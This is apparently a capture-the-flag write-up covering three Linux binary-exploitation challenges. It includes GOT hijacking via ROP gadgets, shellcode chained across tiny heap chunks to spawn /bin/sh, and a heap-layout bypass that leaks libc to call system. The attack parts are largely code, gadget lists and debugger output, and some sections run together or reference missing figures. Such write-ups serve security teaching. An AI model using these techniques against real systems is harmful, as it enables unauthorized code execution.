// local variable allocation has failed, the output may be wrong!
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char nptr; // [rsp+0h] [rbp-40h]
  char buf[40]; // [rsp+10h] [rbp-30h]
  int v6; // [rsp+38h] [rbp-8h]
  int v7; // [rsp+3Ch] [rbp-4h]
# flag string
.data:0000000000601058 flag db 'flag',0
# GOT entries (.got.plt)
.got.plt:0000000000601018 off_601018 dq offset write ; DATA XREF: _write↑r
.got.plt:0000000000601020 off_601020 dq offset printf ; DATA XREF: _printf↑r
.got.plt:0000000000601028 off_601028 dq offset alarm ; DATA XREF: _alarm↑r
.got.plt:0000000000601030 off_601030 dq offset read ; DATA XREF: _read↑r
.got.plt:0000000000601038 off_601038 dq offset setvbuf ; DATA XREF: _setvbuf↑r
.got.plt:0000000000601040 off_601040 dq offset atoi ; DATA XREF: _atoi↑r
Analysis
The biggest challenge is the endless while loop that keeps receiving input. We do have a stack overflow (the program reads an unbounded number of bytes into buf, which is only 0x30 bytes away from rbp), but we never leave the while loop, so main never returns through the overwritten return address.
Thankfully, pwntools has a shutdown method that closes one direction of the stream, so the program's read sees end-of-file and the loop can end:
shutdown(self, direction)
    "direction must be in ['in', 'out', 'read', 'recv', 'send', 'write']"
However, once the stream is closed there is no further interaction, so a two-stage attack (leak libc, then send a second payload) is not possible. The program also does not import system, so the only option is a one-shot ROP chain that reads the flag and prints it.
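The half-close behaviour can be tried locally without the target. The following is a minimal sketch using only Python's standard `socket` module; the reader function `drain_until_eof` is a hypothetical stand-in for the target's read loop, not the challenge code. It shows that shutting down the sending side delivers end-of-file to the peer while the other direction stays usable.

```python
import socket


def drain_until_eof(sock):
    """Stand-in for the target's loop: read until recv() reports EOF."""
    chunks = []
    while True:
        data = sock.recv(4096)
        if not data:  # b"" means the peer shut down its sending side
            break
        chunks.append(data)
    return b"".join(chunks)


attacker, target = socket.socketpair()
attacker.sendall(b"payload")
attacker.shutdown(socket.SHUT_WR)  # half-close: we can no longer send

received = drain_until_eof(target)  # the loop ends because of EOF
target.sendall(b"flag contents")    # the reverse direction still works
reply = attacker.recv(4096)

attacker.close()
target.close()
```

This is why everything has to be packed into a single payload: after the half-close the attacker can still receive output but cannot send anything else.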
There is a tip for alarm:
$ gdb -q /usr/lib/x86_64-linux-gnu/libc.so.6
pwndbg: loaded 177 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from /usr/lib/x86_64-linux-gnu/libc.so.6...
Reading symbols from /usr/lib/debug/.build-id/9c/9b4c997fbbff4ea98320bb8c286051f9ed6513.debug...
pwndbg> disassemble alarm
Dump of assembler code for function alarm:
   0x00000000000cb2d0 <+0>:  mov eax,0x25
   0x00000000000cb2d5 <+5>:  syscall
   0x00000000000cb2d7 <+7>:  cmp rax,0xfffffffffffff001
   0x00000000000cb2dd <+13>: jae 0xcb2e0 <alarm+16>
   0x00000000000cb2df <+15>: ret
   0x00000000000cb2e0 <+16>: mov rcx,QWORD PTR [rip+0xf2b89] # 0x1bde70
   0x00000000000cb2e7 <+23>: neg eax
   0x00000000000cb2e9 <+25>: mov DWORD PTR fs:[rcx],eax
   0x00000000000cb2ec <+28>: or rax,0xffffffffffffffff
   0x00000000000cb2f0 <+32>: ret
End of assembler dump.
A syscall instruction sits at offset 5 from the start of alarm. If we add 0x5 to the alarm entry in the GOT, that entry points directly at syscall, and calling alarm afterwards executes a system call with whatever value we put in rax. This technique is known as GOT hijacking. Search for add gadgets:
$ ROPgadget --binary recho --only "add|ret"
Gadgets information
============================================================
0x00000000004008af : add bl, dh ; ret
0x00000000004008ad : add byte ptr [rax], al ; add bl, dh ; ret
0x00000000004008ab : add byte ptr [rax], al ; add byte ptr [rax], al ; add bl, dh ; ret
0x00000000004008ac : add byte ptr [rax], al ; add byte ptr [rax], al ; ret
0x0000000000400830 : add byte ptr [rax], al ; add cl, cl ; ret
0x00000000004008ae : add byte ptr [rax], al ; ret
0x00000000004006f8 : add byte ptr [rcx], al ; ret
0x000000000040070d : add byte ptr [rdi], al ; ret
0x0000000000400832 : add cl, cl ; ret
0x00000000004006f4 : add eax, 0x20098e ; add ebx, esi ; ret
0x000000000040070a : add eax, 0x70093eb ; ret
0x00000000004006f9 : add ebx, esi ; ret
0x00000000004005b3 : add esp, 8 ; ret
0x00000000004005b2 : add rsp, 8 ; ret
0x00000000004005b6 : ret

Unique gadgets found: 15
And search pop gadgets:
$ ROPgadget --binary recho --only "pop|ret"
Gadgets information
============================================================
0x000000000040089c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040089e : pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004008a0 : pop r14 ; pop r15 ; ret
0x00000000004008a2 : pop r15 ; ret
0x00000000004006fc : pop rax ; ret
0x000000000040089b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040089f : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400690 : pop rbp ; ret
0x00000000004008a3 : pop rdi ; ret
0x00000000004006fe : pop rdx ; ret
0x00000000004008a1 : pop rsi ; pop r15 ; ret
0x000000000040089d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004005b6 : ret

Unique gadgets found: 13
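With these gadgets, the GOT patch can be expressed as a short chain. The sketch below uses only addresses from the listings above (pop rax, pop rdi, add byte ptr [rdi], al, and the alarm slot at 0x601028) and plain `struct` packing instead of pwntools. It assumes that alarm has already been resolved in the GOT when the chain runs and that adding 5 does not carry out of the low byte of its address (true for the libc disassembled above, where alarm ends in 0xd0). The helper names are illustrative.

```python
import struct

# Addresses taken from the ROPgadget and IDA listings above.
POP_RAX = 0x4006FC      # pop rax ; ret
POP_RDI = 0x4008A3      # pop rdi ; ret
ADD_RDI_AL = 0x40070D   # add byte ptr [rdi], al ; ret
ALARM_GOT = 0x601028    # .got.plt slot holding the address of alarm

SYSCALL_OFFSET = 5      # alarm+5 is the syscall instruction
PADDING = 0x30 + 8      # buf is 0x30 bytes below rbp, plus the saved rbp


def p64(value):
    """Pack a 64-bit little-endian word."""
    return struct.pack("<Q", value)


def patch_alarm_chain():
    """ROP words that add 5 to the low byte of alarm's GOT entry."""
    words = [
        POP_RAX, SYSCALL_OFFSET,  # al = 5
        POP_RDI, ALARM_GOT,       # rdi = &GOT[alarm]
        ADD_RDI_AL,               # *(uint8_t *)rdi += al
    ]
    return b"".join(p64(w) for w in words)


payload = b"A" * PADDING + patch_alarm_chain()
```

After this chain runs, any later call through alarm's PLT stub lands on syscall, so rax has to be loaded with the desired system call number first.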
For system call numbers, check /usr/include/asm/unistd_32.h (32-bit) and /usr/include/asm/unistd_64.h (64-bit).
$ more /usr/include/asm/unistd_64.h
#ifndef _ASM_X86_UNISTD_64_H
#define _ASM_X86_UNISTD_64_H 1
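Once alarm's GOT entry points at syscall, the rest of the one-shot chain could look roughly like the sketch below: open the flag file with system call number 2 (open on x86-64), then read it and write it to stdout through the imported functions. The gadget and flag addresses come from the listings above. The PLT addresses, the scratch buffer address, the assumption that the new file descriptor is 3, and the helper name `flag_chain` are all hypothetical and would need to be taken from the real binary.

```python
import struct

SYS_OPEN = 2             # __NR_open on x86-64
POP_RAX = 0x4006FC       # pop rax ; ret
POP_RDI = 0x4008A3       # pop rdi ; ret
POP_RSI_R15 = 0x4008A1   # pop rsi ; pop r15 ; ret
POP_RDX = 0x4006FE       # pop rdx ; ret
FLAG_STR = 0x601058      # 'flag',0 in .data


def flag_chain(alarm_plt, read_plt, write_plt, scratch, fd=3, count=0x30):
    """Build open/read/write ROP words; PLT and scratch addresses are caller-supplied."""
    words = [
        # open("flag", O_RDONLY) through the patched alarm entry (now a bare syscall)
        POP_RAX, SYS_OPEN, POP_RDI, FLAG_STR, POP_RSI_R15, 0, 0, alarm_plt,
        # read(fd, scratch, count); fd=3 is an assumption about the first free descriptor
        POP_RDI, fd, POP_RSI_R15, scratch, 0, POP_RDX, count, read_plt,
        # write(1, scratch, count)
        POP_RDI, 1, POP_RSI_R15, scratch, 0, POP_RDX, count, write_plt,
    ]
    return b"".join(struct.pack("<Q", w) for w in words)


# Placeholder addresses purely for illustration, not taken from the binary.
example = flag_chain(alarm_plt=0x400600, read_plt=0x400610,
                     write_plt=0x4005F0, scratch=0x601070)
```

The chain is appended after the GOT patch, and the sending side is shut down only after the whole payload has been delivered.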
I renamed some items in the IDA output to make it easier to follow. show and edit are not implemented.
Analysis
Since only the add and del operations exist, a UAF is unlikely. The vulnerability is in add: the index v1 is not bounds-checked, so a note pointer can be stored outside the note array (for example over a GOT entry). Given that NX is disabled, we can write shellcode to the heap and execute it there.
One problem: every note size is in [0,8], and the shellcode is definitely longer than that, so we have to split it into small pieces and link them into a chain.
The basic structure of chunks in heap is:
| Chunk | Content | Length |
|---|---|---|
| Chunk 0 | prev_size | 0x8 bytes |
| | size | 0x8 bytes |
| | Content 0 (old fd) | 0x8 bytes |
| | old bk | 0x8 bytes |
| Chunk 1 | prev_size | 0x8 bytes |
| | size | 0x8 bytes |
| | Content 1 (old fd) | 0x8 bytes |
| | old bk | 0x8 bytes |
| Chunk 2 | ... | ... |
However, after we write 8 bytes of content over the old fd, the 8-byte old bk still follows, not to mention the prev_size and size of the next chunk. We have to use a jmp (2 bytes long) to link each shellcode piece to the one in the next chunk (the chunks are adjacent if allocated in order). Remember that the program sets the 8th byte to 0, so the next piece starts 1+8+8+8=25 bytes after the jmp:
| Chunk | Content | Length |
|---|---|---|
| Chunk 0 | prev_size | 0x8 bytes |
| | size | 0x8 bytes |
| | 0x5 bytes code + 0x2 bytes jmp + 0x1 byte "0" | 0x8 bytes |
| | old bk | 0x8 bytes |
| Chunk 1 | prev_size | 0x8 bytes |
| | size | 0x8 bytes |
| | 0x5 bytes code + 0x2 bytes jmp + 0x1 byte "0" | 0x8 bytes |
| | old bk | 0x8 bytes |
| Chunk 2 | ... | ... |
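We use jmp short xxx to jump to a target address. The operand is xxx = target_addr - current_addr - 2, where the 2 is the length of the jmp itself, because the displacement is relative to the following instruction. Taking the jmp as address 0, the target is 2+1+8+8+8 bytes ahead, so xxx = 2+1+8+8+8-0-2 = 25 = 0x19 (jmp short 0x19).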
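The displacement can be double-checked with a few lines of Python. This is a minimal sketch: the helper name `jmp_short` is illustrative, and the 0x20 stride between consecutive note contents is an assumption that follows from the layout in the table (8 bytes content, 8 bytes old bk, 8 bytes prev_size, 8 bytes size).

```python
def jmp_short(current_addr, target_addr):
    """Encode `jmp short` (opcode 0xEB) from current_addr to target_addr."""
    rel = target_addr - current_addr - 2  # relative to the end of the 2-byte jmp
    if not -128 <= rel <= 127:
        raise ValueError("target out of range for a short jump")
    return bytes([0xEB, rel & 0xFF])


CONTENT_STRIDE = 0x20  # assumed distance between two adjacent note contents
JMP_OFFSET = 5         # the jmp follows 5 bytes of code inside a note

link = jmp_short(JMP_OFFSET, CONTENT_STRIDE)
```

Here `link` is the two bytes `\xEB\x19`, matching the value derived by hand.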
But neither add nor del executes code on the heap, so we need to hijack a GOT entry. Here I choose to hijack free in the GOT because we can trigger it by choosing option 4 (del note).
GOT content:
.got.plt:0000000000202000 dq offset stru_201DF8
.got.plt:0000000000202008 qword_202008 dq 0 ; DATA XREF: sub_880↑r
.got.plt:0000000000202010 qword_202010 dq 0 ; DATA XREF: sub_880+6↑r
.got.plt:0000000000202018 off_202018 dq offset free ; DATA XREF: _free↑r
.got.plt:0000000000202020 off_202020 dq offset puts ; DATA XREF: _puts↑r
.got.plt:0000000000202028 off_202028 dq offset __stack_chk_fail
.got.plt:0000000000202028 ; DATA XREF: ___stack_chk_fail↑r
.got.plt:0000000000202030 off_202030 dq offset printf ; DATA XREF: _printf↑r
.got.plt:0000000000202038 off_202038 dq offset memset ; DATA XREF: _memset↑r
.got.plt:0000000000202040 off_202040 dq offset read ; DATA XREF: _read↑r
.got.plt:0000000000202048 off_202048 dq offset __libc_start_main
.got.plt:0000000000202048 ; DATA XREF: ___libc_start_main↑r
.got.plt:0000000000202050 off_202050 dq offset malloc ; DATA XREF: _malloc↑r
.got.plt:0000000000202058 off_202058 dq offset setvbuf ; DATA XREF: _setvbuf↑r
.got.plt:0000000000202060 off_202060 dq offset atoi ; DATA XREF: _atoi↑r
.got.plt:0000000000202068 off_202068 dq offset exit ; DATA XREF: _exit↑r
The note pointers are stored in:
.bss:00000000002020A0 qword_2020A0 dq 0Ch dup(?) ; DATA XREF: initial+18↑o
So it is not hard to choose an index that reaches a GOT entry. For example, an index of -(0x2020A0-0x202018)/8 = -17 addresses free in the GOT. The whole process is like:
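For the index step specifically, the arithmetic can be checked with a small sketch. The two addresses come from the IDA listings above; the helper name `got_index` is illustrative.

```python
NOTES = 0x2020A0      # qword_2020A0, the array of note pointers in .bss
FREE_GOT = 0x202018   # off_202018, the GOT slot for free
ATOI_GOT = 0x202060   # off_202060, the GOT slot for atoi


def got_index(slot_addr, base=NOTES, width=8):
    """Index that makes base[index] alias slot_addr (8-byte pointers)."""
    quotient, remainder = divmod(slot_addr - base, width)
    if remainder:
        raise ValueError("slot is not pointer-aligned relative to the array")
    return quotient


free_index = got_index(FREE_GOT)
atoi_index = got_index(ATOI_GOT)
```

`free_index` evaluates to -17, the value used above, and the same helper gives -8 for the atoi slot.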
The last step is to get the address of /bin/sh into rdi. Rather than building mov rdi,xxxx ourselves, we can store /bin/sh in a chunk: because free is what triggers the shellcode, rdi already holds the address of the chunk being freed when the hijacked free runs, and that is also the address of /bin/sh.
You may notice that we use mov eax,0x3b instead of mov rax,0x3b. That is because mov eax,0x3b is 5 bytes long, while mov rax,0x3b is 7 bytes long in its usual encoding. Each note has 7 usable bytes and 2 of them must hold \xEB\x19 (jmp short 0x19), which leaves only 5 bytes for code. The exploit also clears rax with xor rax,rax beforehand, although on x86-64 a write to eax already zero-extends into rax.
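The size constraint can be sketched as a small packing helper: each note carries at most 5 bytes of code, padded with nop, followed by the 2-byte jmp short 0x19. The instruction sequence below is an assumed execve shellcode for illustration (rdi is expected to point at /bin/sh already); it is not necessarily the exact sequence used in the original exploit, and `pack_piece` is a hypothetical helper.

```python
JMP_NEXT = b"\xeb\x19"  # jmp short 0x19, lands on the next note's content
NOP = b"\x90"
CODE_BYTES = 5          # 7 usable bytes per note minus the 2-byte jmp


def pack_piece(code):
    """Pad one code fragment to 5 bytes and append the jump to the next note."""
    if len(code) > CODE_BYTES:
        raise ValueError("fragment does not fit in one note")
    return code.ljust(CODE_BYTES, NOP) + JMP_NEXT


# Assumed fragments for execve(rdi, 0, 0).
PIECES = [
    bytes.fromhex("4831f6"),      # xor rsi, rsi
    bytes.fromhex("4831d2"),      # xor rdx, rdx
    bytes.fromhex("b83b000000"),  # mov eax, 0x3b
    bytes.fromhex("0f05"),        # syscall
]

notes = [pack_piece(piece) for piece in PIECES]
```

Every entry in `notes` is exactly 7 bytes, so the program's terminating zero lands in the 8th byte and the jmp always sits at offset 5.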
Or we can hijack atoi in GOT, which is a clever way:
$ file babyfengshui
babyfengshui: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=cecdaee24200fe5bbd3d34b30404961ca49067c6, stripped
$ checksec babyfengshui
[*] '/root/babyfengshui'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
$ ./libc.so.6
GNU C Library (Debian GLIBC 2.19-18+deb8u3) stable release version 2.19, by Roland McGrath et al.
Copyright (C) 2014 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 4.8.4.
Compiled on a Linux 3.16.7 system on 2016-02-12.
Available extensions:
    crypt add-on version 2.1 by Michael Glad and others
    GNU Libidn by Simon Josefsson
    Native POSIX Threads Library by Ulrich Drepper et al
    BIND-8.2.3-T5B
libc ABIs: UNIQUE IFUNC
For bug reporting instructions, please see:
<http://www.debian.org/Bugs/>.
In delete() the pointers are set to NULL after freeing, so there is no UAF.
From add() we can see that each entry of ptr stores a structure:
This explains why update() checks (v3 + *ptr[a1]) >= ptr[a1] - 4, which looks right at first glance: the content of s must not overwrite the size field of chunk v2 (the prev_size field of v2 may be used by s).
The catch is that this check only works when chunk v2 and chunk s are adjacent.
If we add two 0x80 users first:
Then free user0:
Then add a 0x100 user, you will see:
Now the v2 and s of user2 are no longer adjacent, so the restriction in update() can be bypassed.
Next we hijack the GOT (this time free rather than atoi), leak the libc base address, and compute the address of system to call it.
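The effect of the layout on the check can be illustrated with a small model. The function mirrors the comparison quoted from update(); every address below is a made-up placeholder chosen only to show an adjacent and a non-adjacent arrangement, not a value taken from a real heap.

```python
def update_allows(desc_addr, length, struct_addr):
    """Model of the update() check: rejected when desc + length >= struct - 4."""
    return desc_addr + length < struct_addr - 4


# Hypothetical adjacent layout: description s directly followed by struct v2.
ADJ_DESC, ADJ_STRUCT = 0x1008, 0x1090

# Hypothetical layout after the free and re-add: the new description reuses
# the freed space at the start of the heap, its struct sits past user1.
NEW_DESC, NEW_STRUCT = 0x1008, 0x1230
VICTIM_STRUCT = 0x11A0  # struct of user1, located between the two

fits_exactly = update_allows(ADJ_DESC, 0x80, ADJ_STRUCT)
overflow_adjacent = update_allows(ADJ_DESC, 0x84, ADJ_STRUCT)

# Length needed to reach and overwrite the first 4 bytes of user1's struct.
reach = VICTIM_STRUCT - NEW_DESC + 4
overflow_split = update_allows(NEW_DESC, reach, NEW_STRUCT)
```

In the adjacent case the overlong write is rejected, while in the split case the same kind of write passes the check and covers the pointer stored in user1's struct.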
Exploit
The provided libc is 2.19, but the remote server runs 2.23 (identified with LibcSearcher).
The binary calls alarm(), and LibcSearcher takes too much time, so we use the ELF module in pwntools to load libc and calculate the addresses.
/lib32/libc.so.6 on Ubuntu 16.04 does not match either, so I use libc6-i386_2.23-0ubuntu10_amd64 from the LibcSearcher database, and it works.
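The address calculation itself is plain arithmetic once a leak is available. The sketch below keeps it independent of pwntools; the offsets and the leaked value are obviously fake placeholders, and in a real run they would come from the symbol table of the matching libc (for example via the `symbols` mapping of a pwntools `ELF` object).

```python
# Placeholder offsets for illustration only; real values depend on the libc build.
FREE_OFFSET = 0x12340
SYSTEM_OFFSET = 0x5670


def libc_base_from_leak(leaked_addr, symbol_offset):
    """Recover the libc load address from one leaked symbol address."""
    base = leaked_addr - symbol_offset
    if base & 0xFFF:
        # A base that is not page-aligned usually means the wrong libc was assumed.
        raise ValueError("libc base is not page-aligned")
    return base


leaked_free = 0xF7D12340  # pretend value read back from free's GOT entry
libc_base = libc_base_from_leak(leaked_free, FREE_OFFSET)
system_addr = libc_base + SYSTEM_OFFSET
```

The page-alignment check is a cheap way to notice a mismatched libc, which is the situation described above with the 2.19 and 2.23 builds.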